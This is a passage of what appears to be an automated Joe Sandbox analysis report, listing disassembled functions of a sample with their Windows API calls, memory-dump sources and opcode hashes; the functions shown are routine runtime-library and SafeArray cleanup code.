                                                                                          • Instruction ID: 439913017b1c9770480c01ccdaab3ee2fe79e6604b6805362e2b9abb2d0009e2
                                                                                          • Opcode Fuzzy Hash: c53c7905e3d6975fda640ff1978571ff353d14d8053fef05d363e32804238439
                                                                                          • Instruction Fuzzy Hash: D001B574604109BFEF14DFA4C851FFD7BB9EB48308F454155EA019F291DB30D9468798
                                                                                          Function 6D06E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6D099880,00000008,6D06EAC1,00000000,00000000,?,?,6D06D7DD,6D069DEF,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D06E9CA
                                                                                          • __lock.LIBCMT ref: 6D06E9FE
                                                                                            • Part of subcall function 6D072438: __mtinitlocknum.LIBCMT ref: 6D07244E
                                                                                            • Part of subcall function 6D072438: __amsg_exit.LIBCMT ref: 6D07245A
                                                                                            • Part of subcall function 6D072438: EnterCriticalSection.KERNEL32(6D069BD4,6D069BD4,?,6D06EA03,0000000D), ref: 6D072462
                                                                                          • InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6D06EA0B
                                                                                          • __lock.LIBCMT ref: 6D06EA1F
                                                                                          • ___addlocaleref.LIBCMT ref: 6D06EA3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                          • String ID: KERNEL32.DLL
                                                                                          • API String ID: 637971194-2576044830
                                                                                          • Opcode ID: cf9781711006619d5b1412aaf2f6e3ab48ccd0e72936381daca79c510162d7ad
                                                                                          • Instruction ID: e0039bb85fd84624bd18c5bdd9d03d7b4b63968c4a4116d415310a07b8f215e4
                                                                                          • Opcode Fuzzy Hash: cf9781711006619d5b1412aaf2f6e3ab48ccd0e72936381daca79c510162d7ad
                                                                                          • Instruction Fuzzy Hash: 75016171449B409EEB20DF65D804749FBF4FF51319F20890DD599976A1CB74A640CB25
                                                                                          Function 6D01E120 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6D01E29B
                                                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6D01E2B6
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D01E2D7
                                                                                            • Part of subcall function 6D025760: std::tr1::_Xweak.LIBCPMT ref: 6D025769
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D01E309
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01E523
                                                                                          • InterlockedCompareExchange.KERNEL32(6D0AC6A4,45524548,4B4F4F4C), ref: 6D01E544
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 2722669376-0
                                                                                          • Opcode ID: af73010d16bec74a937a3444803de99ed5cf74d593be61c5109ee07fb8a07ed9
                                                                                          • Instruction ID: f5691703ee2b62e366454d05ea00d997c948df5671c7db92c26371bfb62870c3
                                                                                          • Opcode Fuzzy Hash: af73010d16bec74a937a3444803de99ed5cf74d593be61c5109ee07fb8a07ed9
                                                                                          • Instruction Fuzzy Hash: D2D1A075A082069FFB11CFE4CC84BAE77F9AF45304F158569EA05EB281E774E940CBA1
                                                                                          Function 6D028A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction ID: ac6da2f6f23e56582bd52169f25577643377528229d1f8598ab84486bba9cfdc
                                                                                          • Opcode Fuzzy Hash: 2bd0391f5e21538758fc9921b54425b5cd5c035cce26f35e3cfb9162d1124d3c
                                                                                          • Instruction Fuzzy Hash: EA412974A016199FEB00DFA9CD80F6AB7FAAF89310F60858AE519DB355DB31E841CF50
                                                                                          Function 6D028DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction ID: 918e33820898e8dca575cfa73b526b8a565ea11bf546845d9ac3aa0e4cd7545d
                                                                                          • Opcode Fuzzy Hash: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction Fuzzy Hash: EC415B74A016199FEF00DF68CC80F6EB7F9AF89210F60859AE518E7255CB31E941CF50
                                                                                          Function 6D020338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction ID: 197c81bdf64cc6264378c7df4a774ca83b8098539733f3e00ecf8bed52b0bb6e
                                                                                          • Opcode Fuzzy Hash: c89270e79801b86937f1a42f52ebec801e7dfbe192bd25961ae1e0986cec56db
                                                                                          • Instruction Fuzzy Hash: 50415D70A016099FEB10CFA9CD80FADB7F9AF89200F60859AE518EB251CB31DA41CF50
                                                                                          Function 6D028CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction ID: baaee5cc51f08177019295a53ce79c7eb9d161dc168d9cfe2f35ee686b57f133
                                                                                          • Opcode Fuzzy Hash: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction Fuzzy Hash: 99313970E016199FEB00CFA8CD80F6EB7FAAF89210F608696E519E7255CB75E941CF50
                                                                                          Function 6D028F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction ID: 73b3dd4bc63c2712a53899147bf1177d842f8c88c82b84c0fdc3c65a0a743ce4
                                                                                          • Opcode Fuzzy Hash: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction Fuzzy Hash: 96312770E016099FEB00DFA9CC80F6EB7FAAF89210F60858AE519E7251CB75ED418F50
                                                                                          Function 6D028BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE99
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEAC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AEBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction ID: 68de827ab1a57d552f69dc5299a08e21c647ebdcbe94de75f4acbbf088ddcb22
                                                                                          • Opcode Fuzzy Hash: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction Fuzzy Hash: 13313974E016099FEB10DF68CC80F6EB7FAAF89210F60858AE519E7255CB75E941CF50
                                                                                          Function 6D0205DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction ID: e289176af79469cb5f555f617621bc8f64d34c1300c869da222c7e553981afb9
                                                                                          • Opcode Fuzzy Hash: c053a5bf3146faa44cbb865e1cd055a213cea6be0a031b7b3012cdf2d688a725
                                                                                          • Instruction Fuzzy Hash: B9314B70E016199FEB10CFA9CD80B6EB7FAAF89200F20858AE518EB251D771DA40CF50
                                                                                          Function 6D0204D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction ID: 043cc1a4df7189c936b672f61cd62eee917d10cfd695ba7186c6bde9fd00d94a
                                                                                          • Opcode Fuzzy Hash: b62d28c31f3ad2e1328d2aa32b39386efdb9b4d3bfea488bc891bcb2eb3b6b73
                                                                                          • Instruction Fuzzy Hash: BD313C70E116199FDB10CFA9CD80B6EB7F9AF89300F608586E518EB251CB75DA418F50
                                                                                          Function 6D020668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID:
                                                                                          • API String ID: 4225690600-0
                                                                                          • Opcode ID: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction ID: 78225d97f64410b1daf482ada86b17729c11aea6474100d301135b2454eafd33
                                                                                          • Opcode Fuzzy Hash: 4026d9119d739d8b37661477839c34a6c599b3e6db52b317be686f26508b0676
                                                                                          • Instruction Fuzzy Hash: C3313E70E116199FDB10CFA9CD80B6EB7F9AF89300F60859AE518EB251CB71DA41CF50
                                                                                          Function 6D029118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE63
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE73
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02AE86
